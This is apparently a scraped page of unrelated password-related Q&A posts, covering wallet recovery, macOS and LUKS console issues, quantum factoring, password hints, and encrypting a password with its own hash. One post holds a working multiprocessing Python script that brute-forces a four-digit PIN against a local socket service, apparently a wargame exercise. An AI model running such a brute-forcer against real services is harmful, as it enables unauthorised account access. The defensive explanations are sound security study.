I have what I believe are my address and password – don’t know what wallet from 2017

I have what appears to be a GUID and a password. But no recollection what service I used or if I even purchased / transferred or made a transaction with them back in 2017. Any way to check to see if I have anything in here and retrieve it? My current BTC is on a platform I use regularly, this was prior to me setting up my current process last year… Any advice?

python – Divide and Conquer Password Bruteforcer

My program brute-forces a password. The password is a string composed of a key and a four-digit numeric code. The key is known so we are basically brute-forcing between 0000 through to 9999.

An example password is:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 4143

I updated that script I wrote to take advantage of multiprocessing in order to run faster.
The basic idea is to divide the task by the number of CPUs available.
There are two Events set up:

  • prnt_sig_found is used by subprocesses to tell the parent if they succeed in guessing the right password.
  • The parent process then uses child_sig_term to halt each subprocess.

My Python’s rusty and I think I made some bad choices. It would be useful to have my assumptions invalidated. 🙂

#!/usr/bin/env python
# coding: utf-8

import multiprocessing as mp
import socket
import time
import math
import sys
import os

class Connection:
  def __init__(self, pin = 0, max_iter = 10000, sock = None):
    print('initializing socket instance ...')

    self.pin = pin
    self.max_iter = max_iter

    self.password = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ'
    self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

  def p_name(self):
    return mp.current_process().name

  def connect(self, host='127.0.0.1', port=30002):
    print(self.p_name(), 'connecting ...', host, port)
    self.sock.connect((host, port))
    print(self.p_name(), 'connection successful.')

  def write(self, msg):
    print(self.p_name(), 'sending', msg) 
    self.sock.sendall(msg)

  def read(self):
    print(self.p_name(), 'reading data ...')
    data = self.sock.recv(4096)
    return data

  def close(self):
    try:
      self.sock.shutdown(0)
      self.sock.close()
    except socket.error:
      pass

  def execute(self, child_sig_term, prnt_sig_found):
    start_time = time.time()
    print(self.p_name(), 'executing ...')

    self.connect()

    self.write(b'greetings !') # sendall() needs bytes on Python 3
    welcome_str = self.read()
    print(welcome_str)

    while self.pin < self.max_iter:
      if child_sig_term.is_set():
        break

      pin_str = str(self.pin).zfill(4)
      message = self.password + " " + pin_str + "\n" # add newline char to flush message or it doesn't get sent

      self.write(message.encode())
      received_msg = self.read()

      # recv() returns bytes, so compare against a bytes literal
      if b'Wrong' in received_msg:
        print(self.p_name(), 'Wrong guess', pin_str)
      else:
        print('_________________found_____________', received_msg)
        prnt_sig_found.set()
        break

      self.pin += 1
      time.sleep(0.5)

    end_time = time.time()
    total_time = end_time - start_time
    print(self.p_name(), "start: "+str(self.pin), ' end: '+str(self.max_iter), 'total_time: ', str((total_time)/60) + ' minutes')


def main():
  print('main')

  # lists, not tuples: both are appended to below
  connections = []
  processes = []

  # requires read/write access to /dev/shm
  prnt_sig_found = mp.Event()
  child_sig_term = mp.Event()

  MAX_ITER_COUNT = 10000
  processor_count = mp.cpu_count()

  step_count = int(math.floor(MAX_ITER_COUNT / processor_count)) # math.floor returns a float in python 2
  end = step_count
  start = 0

  print('Initial values ->', processor_count, step_count, start, end)

  try:
    for i in range(processor_count):
      conn = Connection(pin = start, max_iter = end)
      proc_name = 'BF( ' + str(start) + ' - ' + str(end) + ' )'

      process = mp.Process(name=proc_name, target=conn.execute, args=(child_sig_term, prnt_sig_found))
      process.daemon = True

      connections.append(conn)
      processes.append(process)

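      # execute() stops before max_iter, so the next range starts at end
      start = end
      end = start + step_count

      # the last worker takes whatever remains so no pin is skipped
      if i == processor_count - 2 or MAX_ITER_COUNT < end: end = MAX_ITER_COUNT
      if MAX_ITER_COUNT < start: start = MAX_ITER_COUNT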

    # start all processes
    for process in processes:
      process.start()

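    # wait until a child reports success or every child has finished its range;
    # joining first would leave the other children running after a match
    while not prnt_sig_found.is_set() and any(p.is_alive() for p in processes):
      prnt_sig_found.wait(0.5)

    # tell the remaining children to stop, then collect them
    child_sig_term.set()
    for process in processes:
      process.join()

  except KeyboardInterrupt:
    # Ctrl-C stops the run; other errors are no longer silently swallowed
    pass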

  finally:
    for conn in connections:
      conn.close()

    for process in processes:
      if process.is_alive():
        process.terminate()
        
      
if __name__ == '__main__':
  main()

encryption – Encrypting a password with its own hash

I just found out that an e-commerce platform (similar to Shopify) I was planning on using allows me to see my password. I know I can’t assume anything and I should (probably) just run away from it, but it got me curious: is there a way to do it securely?

I mean, what if they use the password’s hash as an encryption key to encrypt the password itself? If done properly, could something like this be a reasonable solution?

Moreover, does anyone have any idea why on earth an e-commerce platform would choose to do it?

And no, I don’t plan to implement anything like this.
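The scheme the question describes, written out as an added example (not part of the original post and not the platform's code). The row layout, the PBKDF2 hash and the SHAKE-256 keystream are assumptions chosen so the sketch runs on the standard library alone.

```python
import hashlib
import os

def password_hash(password, salt):
    # PBKDF2 stands in for whatever password hash the platform uses (assumption).
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def keystream_xor(key, nonce, data):
    # Toy stream cipher (SHAKE-256 keystream), a stand-in for a real cipher
    # so the example needs only the standard library. Not for production use.
    stream = hashlib.shake_256(key + nonce).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, stream))

def register(password):
    """Build the hypothetical database row: the password encrypted under its own hash."""
    salt, nonce = os.urandom(16), os.urandom(16)
    key = password_hash(password, salt)
    return {"salt": salt, "nonce": nonce, "hash": key,
            "enc_password": keystream_xor(key, nonce, password.encode())}

def recover_from_row(row):
    """Case 1: the hash is stored for login checks, so the row holds key and ciphertext."""
    return keystream_xor(row["hash"], row["nonce"], row["enc_password"]).decode()

def check_typed_password(row, typed):
    """Case 2: the hash is not stored. The key must be re-derived from a typed
    password, so the server can confirm a password but never display it unprompted."""
    key = password_hash(typed, row["salt"])
    return keystream_xor(key, row["nonce"], row["enc_password"]) == typed.encode()

if __name__ == "__main__":
    sample = "correct horse battery"  # constructed sample password
    row = register(sample)
    print("recovered from the row alone:", recover_from_row(row))
    row_without_hash = {k: v for k, v in row.items() if k != "hash"}
    print("typed password accepted:", check_typed_password(row_without_hash, sample))
    print("wrong password accepted:", check_typed_password(row_without_hash, "wrong guess"))
```

In the first case a copy of the database is enough to read every password; in the second the ciphertext adds nothing over a plain password hash, and its length still reveals the password's length.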

registration – How to tell the user email already exists and if that email address belongs to you then reset the password

I need to show a message to the user if the user tries to create an account and that email address already is taken and if that email address belongs to the user then reset the password for the account associated with that email address.

There are some cases where this could happen.

  • The user created an account before and forgot about it
  • Someone has used their email address to create an account

terminal – Catalina Error: Reset Password Failed Error

The Reset Password Failed Error failed from the perspective of an alternate Admin User. I also tried it from Recovery Mode where the user didn’t appear. In Single User Mode using the ls command, the user does appear. When attempting the reset from Single User Mode after using mount -uw / then launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist then passwd username, it offers the reset, but when attempting, it gives the error that the password is too short when it clearly isn’t too short. How can I recover this user? I’ve also reset user permissions to no avail.

server – Need TTY Console mode to be able to enter LUKS password at boot (Ubuntu 18.04)

I have a (supposed to be) headless server running Ubuntu 18.04 where the boot volume is LUKS encrypted. I am unable to redirect the initial boot process to the serial console (running Putty from a Windows 10 PC) so that I can enter the password. At this point the only option I have is to leave the enclosure open with a video card and USB keyboard installed so I can enter the password – not a workable option.

The serial console port (from the W10 PC) sees the initial GRUB menu up to the “Press ESC for options”, but nothing until I enter the password. After I enter the password, the remainder of the boot process output appears on the serial console port and I can login. Initially I couldn’t even get the output after the password and the console login to work. To get that far I did the following:

  1. Edit /etc/default/grub file so that GRUB_CMDLINE_LINUX reads “console=tty1 console=ttyS5,115200”
  2. Update GRUB with sudo update-grub
  3. sudo systemctl start getty@ttyS5
  4. sudo systemctl enable getty@ttyS5

I need to get the entire boot sequence, including prompt for LUKS password redirected to the serial console port. I’ve tried so many different procedures I can’t possibly put them all down, including a half dozen from this site. Someone please help, I need to be able to seal up the enclosure, with the video card and USB keyboard removed and all interaction with the boot process managed from the serial console port.

Many thanks to the Ubuntu Community in advance.

password cracking – Doesn’t Hashing Negate Quantum Computer Factoring?

I’ve read/watched a lot about Quantum Computers, trying to really get into the physics of it. Seems like the topic is poorly explained. I do understand that it takes a lot of qubits to beat modern encryption, so there’s no concern for a while longer.

So while I do see lots of articles/videos claiming Shor’s algorithm will defeat encryption, nothing has explained how the key is captured, and/or how the hashing/salting of the key is undone such that the algorithm has a proper number to work with. Seems like those are pretty big hurdles to overcome regardless of the algorithm.

usability – Designing password entry to provide hints

This probably wouldn’t be a great idea.

It would be easier to hack

If you did this at the start/middle/end of the word, it would take barely any time to brute-force the account. Basically, that means that the hacker could systematically use dictionary words until they found the correct one.

It’s hard to implement

Also, your login form should be focused and simple and neat, and shouldn’t have all sorts of weird features like this.

Users probably won’t like it

Users are used to forgetting passwords, and they might be a bit confused/shocked/angry/scared if, on the forgot password page, it said the first letters of their password in large letters.

Users are also used to getting reset emails and immediately going to their inbox after pressing the reset button. If they were just faced with two letters and still couldn’t know what it was, then they wouldn’t be able to get in.

Example

Let’s look at this from a user’s point of view.

  1. You set up an account
  2. You want it to be very secure (of course)
  3. You’ve forgotten your password
  4. You can’t remember it at all
  5. You do a password reset
  6. It then shows you the first and last letter of your password in large pink and purple letters
  7. You can remember your password now! Hurrah!

Now, let’s look at this from a hacker’s point of view.

  1. You find out about this website
  2. You see that the password reset shows you the first and last letter of your password in large pink and purple letters
  3. You then put the user’s account username into the password reset
  4. Then, the letters are revealed
  5. You then get a robot to try out all the dictionary words starting with those letters
  6. You have then got access to the user’s login details.

Now then, this would not be good. No it wouldn’t.
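To put numbers on the answer's argument, here is an added example (not part of the original answer) that measures how much protection a lockout limit still gives once the reset page shows the first and last letter. The candidate list is constructed sample data, and passwords are assumed to be drawn uniformly from it.

```python
from collections import Counter
from fractions import Fraction

# Constructed sample: 20 dictionary-style passwords, no duplicates (not real user data).
CANDIDATES = [
    "password", "passport", "paranoid", "princess", "platinum", "pancakes",
    "dragon", "dolphin", "diamond", "sunshine", "shadow", "summer",
    "monkey", "master", "mustang", "football", "freedom", "flower",
    "letmein", "liverpool",
]

def hint_of(password):
    """The hint the reset page in the answer would display: first and last letter."""
    return (password[0], password[-1])

def bucket_sizes(candidates):
    """How many candidate passwords share each displayed hint."""
    return Counter(hint_of(p) for p in candidates)

def success_within(candidates, attempts, hint_shown):
    """Probability that a password drawn uniformly from `candidates` is matched
    within `attempts` guesses, i.e. before a lockout at that limit triggers."""
    total = len(candidates)
    if not hint_shown:
        return Fraction(min(attempts, total), total)
    # With the hint, only the words in the password's own bucket need trying.
    covered = sum(min(attempts, n) for n in bucket_sizes(candidates).values())
    return Fraction(covered, total)

def expected_guesses(candidates, hint_shown):
    """Average number of guesses needed when candidates are tried in list order."""
    total = len(candidates)
    if not hint_shown:
        return Fraction(total + 1, 2)
    # A bucket of size n is hit with probability n/total and costs (n+1)/2 guesses.
    weighted = sum(n * (n + 1) // 2 for n in bucket_sizes(candidates).values())
    return Fraction(weighted, total)

if __name__ == "__main__":
    for budget in (1, 3, 5):
        print("lockout after", budget, "attempts:",
              "no hint", success_within(CANDIDATES, budget, False),
              "| hint", success_within(CANDIDATES, budget, True))
    print("expected guesses:", expected_guesses(CANDIDATES, False),
          "->", expected_guesses(CANDIDATES, True))
```

On this sample a three-attempt lockout holds the chance of a match to 3/20 without the hint, and stops nothing once the hint is displayed.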